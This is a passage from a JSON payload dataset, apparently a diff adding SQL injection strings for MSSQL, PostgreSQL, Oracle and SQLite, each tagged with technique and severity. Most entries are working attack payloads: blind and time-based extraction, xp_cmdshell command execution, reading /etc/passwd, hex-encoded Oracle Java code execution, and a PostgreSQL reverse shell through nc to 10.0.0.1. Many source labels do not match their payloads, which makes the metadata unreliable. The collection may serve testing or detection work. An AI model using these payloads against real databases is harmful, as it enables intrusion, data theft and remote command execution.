"technique": "basic", + "dbms": "mssql", + "severity": "high", + "source": "MSSQL Injection" + } + }, + { + "payload": "SELECT DB_NAME(N);", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Injection" + } + }, + { + "payload": "SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Injection" + } + }, + { + "payload": "SELECT name FROM master..sysobjects WHERE xtype = 'U';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT name FROM ..sysobjects WHERE xtype='U'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT table_catalog, table_name FROM information_schema.columns", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "SELECT table_name FROM information_schema.tables WHERE table_catalog=''", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Default Databases" + } + }, + { + "payload": "SELECT table_catalog, column_name FROM information_schema.columns", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "high", + "source": "MSSQL Default Databases" + } + }, + { + "payload": "SELECT COL_NAME(OBJECT_ID('.'), )", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Default Databases" + } + }, + { + "payload": "$ SELECT name FROM master..sysdatabases", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Comments" + } + }, + { + "payload": "$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Enumeration" + } + }, + { + "payload": "$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL List Databases" + } + }, + { + "payload": "SELECT UserId, UserName from Users", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL List Tables" + } + }, + { + "payload": "convert(int,@@version)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL List Columns" + } + }, + { + "payload": "cast((SELECT @@version) as int)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL List Columns" + } + }, + { + "payload": "' + convert(int,@@version) + '", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Union Based" + } + }, + { + "payload": "' + cast((SELECT @@version) as int) + '", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Union Based" + } + }, + { + "payload": "AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Error Based" + } + }, + { + "payload": "SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Blind Based" + } + }, + { + "payload": "SELECT message FROM data WHERE row = 1 and message like 't%'", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Blind Based" + } + }, + { + "payload": "AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Blind With Substring Equivalent" + } + }, + { + "payload": "AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Blind With Substring Equivalent" + } + }, + { + "payload": "AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mssql", + "severity": "high", + "source": "MSSQL Blind With Substring Equivalent" + } + }, + { + "payload": "AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "type_conversion", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Blind With Substring Equivalent" + } + }, + { + "payload": "ProductID=1;waitfor delay '0:0:10'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Time Based" + } + }, + { + "payload": "ProductID=1);waitfor delay '0:0:10'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Time Based" + } + }, + { + "payload": "ProductID=1';waitfor delay '0:0:10'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Time Based" + } + }, + { + "payload": "ProductID=1');waitfor delay '0:0:10'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Time Based" + } + }, + { + "payload": "ProductID=1));waitfor delay '0:0:10'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Time Based" + } + }, + { + "payload": "IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Stacked Query" + } + }, + { + "payload": "IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "mssql", + "severity": "high", + "source": "MSSQL Stacked Query" + } + }, + { + "payload": "SELECT 'A'SELECT 'B'SELECT 'C'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL File Manipulation" + } + }, + { + "payload": "SELECT id, username, password FROM users WHERE username = 'admin'exec('update[users]set[password]=''a''')--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "MSSQL File Manipulation" + } + }, + { + "payload": "SELECT id, username, password FROM users WHERE username = 'admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "MSSQL File Manipulation" + } + }, + { + "payload": "ProductID=1; DROP members--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Read File" + } + }, + { + "payload": "OPENROWSET(BULK 'C:\\path\\to\\file', SINGLE_CLOB)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Write File" + } + }, + { + "payload": "execute spWriteStringToFile 'contents', 'C:\\path\\to\\', 'file'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "XP_CMDSHELL" + } + }, + { + "payload": "EXEC xp_cmdshell \"net user\";", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "Python Script" + } + }, + { + "payload": "EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "Python Script" + } + }, + { + "payload": "EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "Python Script" + } + }, + { + "payload": "EXEC sp_configure 'show advanced options',1;", + "category": "sqli", + "metadata": { + "type": "out_of_band", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "MSSQL Out of Band" + } + }, + { + "payload": "RECONFIGURE;", + "category": "sqli", + "metadata": { + "type": "out_of_band", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Out of Band" + } + }, + { + "payload": "EXEC sp_configure 'xp_cmdshell',1;", + "category": "sqli", + "metadata": { + "type": "out_of_band", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "MSSQL Out of Band" + } + }, + { + "payload": "> The links between databases work even across forest trusts.", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL List Permissions" + } + }, + { + "payload": "' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "postgresql", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "postgresql", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "postgresql", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "postgresql", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT database_to_xml(true,true,''); -- dump the current database to XML", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Enumeration" + } + }, + { + "payload": "SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Enumeration" + } + }, + { + "payload": "' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "high", + "source": "PostgreSQL Methodology" + } + }, + { + "payload": "' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "high", + "source": "PostgreSQL Methodology" + } + }, + { + "payload": "select 1 from pg_sleep(5)", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Error Based" + } + }, + { + "payload": ";(select 1 from pg_sleep(5))", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Error Based" + } + }, + { + "payload": "select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL XML Helpers" + } + }, + { + "payload": "select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "high", + "source": "PostgreSQL Blind" + } + }, + { + "payload": "select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Blind With Substring Equivalent" + } + }, + { + "payload": "select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Blind With Substring Equivalent" + } + }, + { + "payload": "AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR'", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Time Based" + } + }, + { + "payload": "AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Time Based" + } + }, + { + "payload": "AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Time Based" + } + }, + { + "payload": "declare c text;", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Identify Time Based" + } + }, + { + "payload": "declare p text;", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Identify Time Based" + } + }, + { + "payload": "SELECT into p (SELECT YOUR-QUERY-HERE);", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Identify Time Based" + } + }, + { + "payload": "execute c;", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "command_execution", + "dbms": "postgresql", + "severity": "critical", + "source": "Identify Time Based" + } + }, + { + "payload": "END;", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Identify Time Based" + } + }, + { + "payload": "$$ language plpgsql security definer;", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Identify Time Based" + } + }, + { + "payload": "SELECT f();", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Identify Time Based" + } + }, + { + "payload": "SELECT 1;CREATE TABLE NOTSOSECURE (DATA VARCHAR(200));--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Database Dump Time Based" + } + }, + { + "payload": "select pg_ls_dir('./');", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Table Dump Time Based" + } + }, + { + "payload": "select pg_read_file('PG_VERSION', 0, 200);", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Table Dump Time Based" + } + }, + { + "payload": "CREATE TABLE temp(t TEXT);", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Columns Dump Time Based" + } + }, + { + "payload": "COPY temp FROM '/etc/passwd';", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Columns Dump Time Based" + } + }, + { + "payload": "SELECT * FROM temp limit 1 offset 0;", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Columns Dump Time Based" + } + }, + { + "payload": "SELECT lo_get(16420); -- use the OID returned from the above", + "category": "sqli", + "metadata": { + "type": "out_of_band", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Out of Band" + } + }, + { + "payload": "CREATE TABLE nc (t TEXT);", + "category": "sqli", + "metadata": { + "type": "stacked_queries", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Stacked Query" + } + }, + { + "payload": "INSERT INTO nc(t) VALUES('nc -lvvp 2346 -e /bin/bash');", + "category": "sqli", + "metadata": { + "type": "stacked_queries", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Stacked Query" + } + }, + { + "payload": "SELECT * FROM nc;", + "category": "sqli", + "metadata": { + "type": "stacked_queries", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Stacked Query" + } + }, + { + "payload": "COPY nc(t) TO '/tmp/nc.sh';", + "category": "sqli", + "metadata": { + "type": "stacked_queries", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Stacked Query" + } + }, + { + "payload": "COPY (SELECT 'nc -lvvp 2346 -e /bin/bash') TO '/tmp/pentestlab';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL File Manipulation" + } + }, + { + "payload": "SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL File Read" + } + }, + { + "payload": "SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL File Read" + } + }, + { + "payload": "COPY (SELECT '') to PROGRAM 'nslookup BURP-COLLABORATOR-SUBDOMAIN'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL File Write" + } + }, + { + "payload": "CREATE TABLE shell(output text);", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Command Execution" + } + }, + { + "payload": "COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL Command Execution" + } + }, + { + "payload": "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Using COPY TO/FROM PROGRAM" + } + }, + { + "payload": "SELECT system('cat /etc/passwd | nc ');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "Using COPY TO/FROM PROGRAM" + } + }, + { + "payload": "SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "high", + "source": "Using libc.so.6" + } + }, + { + "payload": "SHOW is_superuser;", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL WAF Bypass" + } + }, + { + "payload": "SELECT current_setting('is_superuser');", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL WAF Bypass" + } + }, + { + "payload": "SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "PostgreSQL WAF Bypass" + } + }, + { + "payload": "SELECT DISTINCT owner FROM all_tables;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Injection" + } + }, + { + "payload": "SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "Oracle SQL Injection" + } + }, + { + "payload": "SELECT table_name FROM all_tables;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT owner, table_name FROM all_tables;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER=''", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Default Databases" + } + }, + { + "payload": "SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='' AND OWNER=''", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "Oracle SQL Default Databases" + } + }, + { + "payload": "AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Comments" + } + }, + { + "payload": "AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "oracle", + "severity": "high", + "source": "Oracle SQL Comments" + } + }, + { + "payload": "select * from dba_java_policy", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Database Credentials" + } + }, + { + "payload": "select * from user_java_policy", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Database Credentials" + } + }, + { + "payload": "exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle SQL Methodology" + } + }, + { + "payload": "exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle SQL Methodology" + } + }, + { + "payload": "exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle SQL Methodology" + } + }, + { + "payload": "SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\\\windows\\\\system32\\\\cmd.exe','/c', 'dir >c:\\test.txt') FROM DUAL", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL List Databases" + } + }, + { + "payload": "SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL List Databases" + } + }, + { + "payload": "SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL List Tables" + } + }, + { + "payload": "EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle SQL List Columns" + } + }, + { + "payload": "SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle SQL List Columns" + } + }, + { + "payload": "EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle SQL List Columns" + } + }, + { + "payload": "SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Error Based" + } + }, + { + "payload": "SELECT os_command.exec_clob('') cmd from dual", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle SQL Blind" + } + }, + { + "payload": "DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '', enabled => TRUE)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "command_execution", + "dbms": "oracle", + "severity": "critical", + "source": "Oracle Blind With Substring Equivalent" + } + }, + { + "payload": "utl_file.get_line(utl_file.fopen('/path/to/','file','R'), )", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Time Based" + } + }, + { + "payload": "utl_file.put_line(utl_file.fopen('/path/to/','file','R'), )", + "category": "sqli", + "metadata": { + "type": "out_of_band", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "Oracle SQL Out of Band" + } + }, + { + "payload": "AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "sqlite", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "sqlite", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "ATTACH DATABASE '/var/www/lol.php' AS lol;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "sqlite", + "severity": "medium", + "source": "SQLite 